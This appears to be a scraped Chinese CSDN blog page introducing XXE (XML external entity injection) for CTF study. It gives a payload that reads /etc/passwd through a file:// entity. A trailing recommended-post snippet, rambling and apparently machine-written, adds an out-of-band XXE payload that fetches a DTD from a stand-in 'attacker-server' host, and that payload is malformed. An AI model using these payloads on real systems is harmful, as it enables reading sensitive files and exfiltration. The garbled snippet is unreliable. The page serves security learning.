XXE漏洞概述

最新推荐文章于 2025-07-01 10:24:10 发布
最新推荐文章于 2025-07-01 10:24:10 发布
阅读量1.2k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43504939/article/details/90514581
XXE漏洞是XML外部实体注入所导致的安全问题,常见于不安全的XML数据处理。通过构造恶意XML,攻击者可以利用DTD的外部实体引用访问系统敏感文件,如通过`&f;`实体读取`/etc/passwd`。PHP中的`simplexml_load_string()`函数在高版本已默认禁止解析外部实体,但旧版本或未禁用外部实体的应用仍存在风险。防止XXE的关键在于正确配置XML解析器,禁止加载外部实体。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XXE(xml external entity -injection")

是xml的外部文档的一种注入漏洞。

首先来看一下xml的大体结构:

在这里插入图片描述

在这里插入图片描述

DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。

主要出问题的大多是从DTD这部分出的。

DTD大体框架:

  1. DTD 内部声明
    <! DOCTYPE 根元素 [元素声明]>
  2. DTD 外部引用
    <! DOCTYPE 根元素名称 SYSTEM “外部DTD的URI”>
  3. 引用公共DTD
    < !DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI ”>

外部实体引用payload:

<?xml version = "1.0"?>

< !DOCTYPE ANY [
< !ENTITY f SYSTEM “file:///etc/passwd”>
]>
< x>&f;< /x>

利用这个来访问敏感文件。

外部引用可以支持http,file,ftp等协议。
如果一个接口支持接收xml数据,且没有对xml数据做任何安全上的措施,就可
能导致XXE漏洞

simplexml_load_string()
函数转换形式良好的 XML 字符串为 SimpleXMLElement 对象
在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外
部实体内容的。

所以在2.9以上版本的这个漏洞很难利用

漏洞发生在应用程序解析xml输入时,没有禁止外部实体的加载,导致攻击者构造恶意的xml。

最低0.47元/天 解锁文章

200万优质内容无限畅学
GEO ssrf漏洞复现(CVE-2024-29198)
iSee857的博客
06-16 302
SSRF漏洞源于产品在未设置代理基础URL时候,可以通过Demo请求端点实现服务端请求伪造(SSRF),可以嗅探内网数据。(CVE-2024-CVE-2024-29198)
XXE漏洞介绍与XML概述
afei001
02-06 282
1.XXE漏洞介绍 XXE(XML External Entity attack),全称是:XML外部实体攻击。 XXE漏洞:当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击网站、发起Dos攻击等危害。 2.XML介绍 XML指可扩展标记语言(Extensible Markup Language)。用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的...
漏洞修复】GeoServer TestWFSpost 存在SSRF漏洞CVE-2024-29198 附POC
最新发布
m0_71744960的博客
07-01 995
GeoServer是一个功能齐全,遵循OGC开放标准的开源WFS-T和WMS服务器。
XXE漏洞详解(全网最详细)
qq_61553520的博客
05-09 9926
XXE:全称为XML Enternal Entity Injection,中文名称:XML外部实体注入。
XXE漏洞原理
weixin_44843084的博客
05-20 630
XXE漏洞原理 XXE(外部实体注入)是XML外部实体注入。 当应用程序允许引用外部实体时,通过XXE,攻击者可以实现任意文件读取,DOS拒绝服务攻击以及代理扫描内网等。 常规的POST的content-type为application/x-www-form-urlencoded,但只要将其修改为application/json,就可以传入json格式的POST数据,修改为application/xml,就可以传入XML格式的数据。常规的WAF一般只检测application/x-www-form-urle
XXE详解
qq_51780583的博客
03-23 5915
XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取,系统命令执行,内网端口探测,攻击内网网站等危害。
XXE漏洞安全-全网最详细讲解】
LCW991207的博客
08-04 5700
XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。XXE漏洞的发生通常是由于应用程序在解析XML输入时未正确验证或限制实体引用。攻击者可以通过构造恶意的XML输入,将外部实体(external entity)引用进来,然后利用这些实体来获取敏感信息或进行其他攻击。
【Java代码审计】XXE漏洞
大河之犬的博客
04-02 1685
XXE 漏洞的原理主要是利用了 XML 解析器的实体引用特性。在 XML 中,可以使用实体引用来引用外部的实体,例如文件,以便在 XML 文档中重用内容。然而,如果 XML 解析器未经适当配置,可能会导致外部实体的任意读取和执行,从而引发安全漏洞。攻击者可以构造恶意的 XML 文件,其中包含对外部实体的引用,并通过将这个 XML 文件提交给目标应用程序来触发漏洞。当目标应用程序解析这个 XML 文件时,解析器会尝试读取和解析外部实体,从而使得攻击者能够访问本地或远程系统上的文件,并执行相关操作。
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
pikachu之XXE漏洞
weixin_51446936的博客
06-18 2141
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
用友U8 Cloud XChangeServlet XXE漏洞复现
0xSec
04-30 886
​用友U8 Cloud XChangeServlet接口处存在XXE漏洞,攻击者可通过该漏洞获取敏感文件信息,攻击者添加恶意内容,通过易受攻击的代码,就能够攻击包含缺陷的XML处理器。
GeoServer和GeoTools XML外部实体注入漏洞(CVE-2025-30220)
m0_50125527的博客
06-23 714
GeoServer 是一款开源的 Java 服务器软件,专为共享、处理和编辑地理空间数据而设计。它遵循开放地理空间联盟(OGC)标准,支持 Web 地图服务(WMS)、Web 要素服务(WFS)、Web 覆盖服务(WCS)等协议,能够高效发布和管理来自多种数据源(如 PostGIS、Shapefile、Oracle Spatial 等)的地图数据。
GeoServer历史漏洞分析
好记性不如烂笔头
07-09 5765
github上可以看到GeoServer安全问题列表,包含所有的历史漏洞:https://github.com/geoserver/geoserver/securityCVE编号漏洞类型SQLSSRF任意文件读取信息泄漏文件上传XPath RCE关于CVE-2024-36401 XPath RCE的分析,可以看我之前的文章:https://blog.youkuaiyun.com/baidu_25299117/article/details/140159307?
【网络安全】XXE漏洞详细解析
你在看屏幕的同时,屏幕也在注视着你
09-30 2107
XXE漏洞详细解析
ssrf与xxe
jonhswei的博客
04-24 371
是一种注入攻击,攻击者利用不安全的 XML 解析器,诱使应用解析外部实体,从而在服务器端执行恶意操作。通过 XXE 攻击,攻击者能够通过恶意构造的 XML 数据来引发应用加载外部实体,可能导致文件读取、服务器端请求伪造(SSRF)、远程代码执行等问题。都是常见的 Web 安全漏洞,SSRF 主要通过伪造请求攻击服务器,而 XXE 主要通过注入恶意 XML 来利用 XML 解析器。:攻击者通过上传、提交或注入恶意 XML 数据,其中包含对外部实体的引用(如外部 URL 或本地文件路径)。
1day 【漏洞复现 | 成功上传Webshell】Geoserver 任意文件上传(CVE-2023-51444),从零基础到精通,收藏这篇就够了!
Python_0011的博客
03-07 998
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!未经授权,严禁转载,如需转载,联系小明信安公众号。这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」下面的连接参数选项,需要选择绝对路径,以这个镜像为例,点击浏览,目录选择。注意两个test,前面的是工作空间,后面的是存储仓库。
GeoServer远程代码执行漏洞复现(CVE-2024-36401)
qq_26229345的博客
07-08 9158
文章仅供参考,本文所提供的信息只为网络安全人员对自己所负责的网站、服务器等进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责!
【靶机实战】GeoServer 远程代码执行漏洞复现
qq_21039641的博客
07-10 2244
CVE-2024-36401是一个高危的远程代码执行漏洞,存在于GeoServer软件中。GeoServer是一个用Java编写的开源服务器,用于共享和编辑地理空间数据。该漏洞允许未经身份验证的远程攻击者通过构造特定的请求,在服务器上执行任意代码,从而可能获取服务器的控制权。这个漏洞在2024年7月2日被公开,影响多个版本的GeoServer,包括2.24.0至2.24.3以及2.25.0至2.25.1。
GeoServer SQL 注入漏洞复现(CVE-2024-25157)附poc_geoserverl漏洞
2401_83974607的博客
04-17 1044
GeoServer是OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作,通过 GeoServer 可以比较容易的在用户之间迅速共享空间地理信息。在2.22.1和2.21.4之前版本中,在开放地理空间联盟(OGC)标准定义的过滤器和函数表达式中发现了一个SQL注入问题,未经身份验证的攻击者可以利用该漏洞进行SQL注入,执行恶意代码。
xxe漏洞复现ssrf
03-27
### XXE漏洞与SSRF的关系 XXE(XML External Entity)漏洞允许攻击者通过恶意构造的外部实体引用,读取服务器上的文件或其他资源。而SSRF(Server-Side Request Forgery)是一种让目标服务器发起请求到指定地址的安全问题。两者可以通过特定方式结合使用,在某些场景下实现更复杂的攻击效果。 例如,XXE可以和SSRF一起用于探测其他内网主机的信息,基于HTTP协议进行端口扫描或服务发现[^1]。这种组合能够使攻击范围扩大至内部网络中的更多资产。 --- ### Zimbra RCE漏洞背景及其利用关系 在一些复杂的应用程序中,多个安全缺陷可能相互关联形成更大的威胁模型。比如Zimbra远程代码执行漏洞(CVE-2019-9670),其完整的RCE链依赖于另一个SSRF漏洞(CVE-2019-9621)[^2]。尽管官方文档提到需要两个漏洞配合才能达成最终的目标——即完全控制受害者的机器;但实际上也有方法绕过此限制单独触发该功能模块从而直接获得shell权限的情况发生(具体细节未公开披露)。 这表明即使缺少明确标注出来的辅助条件也可能找到替代路径去完成整个攻击链条的设计意图之外的操作行为模式转换过程中的可能性探索方向之一就是寻找是否存在类似的逻辑错误或者配置不当之处作为突破口来进行尝试突破现有的防护机制进而达到预期目的的同时还应该考虑到实际环境中可能会遇到的各种阻碍因素影响最终成功率高低程度不同而已。 --- ### 复现步骤概述 为了验证上述理论假设成立与否并通过实践检验得出结论证明观点正确无误的话,则需按照如下方式进行操作: #### 准备工作 1. **环境搭建**: 使用虚拟机创建隔离测试环境,安装易受攻击版本的服务软件实例。 2. **工具准备**: 下载并启动Burp Suite社区版用作中间拦截器角色以便后续手动调整数据包内容后再转发出去供进一步分析研究之用。 #### 实际演练部分 ##### 设置代理连接 在浏览器里设定好相应的出口通道指向本地监听端口号之后加载含有潜在风险点位链接地址页面时自动将所有通信流量导向我们事先布置好的陷阱装置等待捕捉感兴趣的数据片段回来审查是否有异常现象出现值得深入挖掘下去的价值所在之处存在即可视为成功捕获有效样本素材可供下一步骤处理使用前先保存原始状态副本留档备案以防万一丢失重要线索证据材料造成无法挽回的局面后果严重必须谨慎对待每一个环节都不能马虎大意才行啊同志们加油干吧! ```plaintext GET /vuln/xxetest.php HTTP/1.1 Host: target-site.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ``` ##### 构造Payload 接着把刚才截获下来的未经修改过的原样复制粘贴过来放到重复发送窗口里面替换掉原有的参数字段值换成精心设计制作而成的新颖独特而又充满危险性的特殊字符序列结构形式表现出来看看会发生什么有趣的事情呢?让我们拭目以待吧朋友们! ```xml <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE test[ <!ENTITY % remote SYSTEM "http://attacker-server/payload.dtd"> <!ENTITY % init "<!ENTITY % send SYSTEM 'file:///etc/passwd'>"> ]> <reset> <login>admin;%send;</login> <secret>Any bugs?</secret> </reset> ``` 注意这里引入了一个外部DTD定义文件`payload.dtd`,它包含了更多的指令用来指示解析引擎如何去构建新的实体标签嵌套层次关系直到最后一步才真正暴露核心秘密武器位置信息泄露给外界观察员看到为止才算圆满完成任务使命结束啦哈哈哈哈哈!!! --- ### 结果评估标准说明 当以上所有的准备工作都顺利完成以后就可以静候佳音传来好消息咯~ 如果一切正常顺利的话那么你应该能够在自己的监控屏幕上清晰地看见来自受害者那边传来的回应消息当中携带了原本不应该被轻易获取得到的秘密情报资料比如说操作系统用户名列表之类的敏感隐私类别的东西就充分证明我们的实验取得了圆满的成功成果喜人呀各位小伙伴们快来庆祝一番吧😊🎉👏 当然啦除了单纯追求技术层面的乐趣体验之外更重要的是要从中吸取教训总结经验不断提高自身的网络安全意识水平时刻保持警惕防止自己成为下一个倒霉蛋哦记住一句话叫做“道高一尺魔高一丈”永远不要低估敌人可能拥有的强大实力好吗谢谢大家听我说完这些话希望对你们有所帮助再见👋~ ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值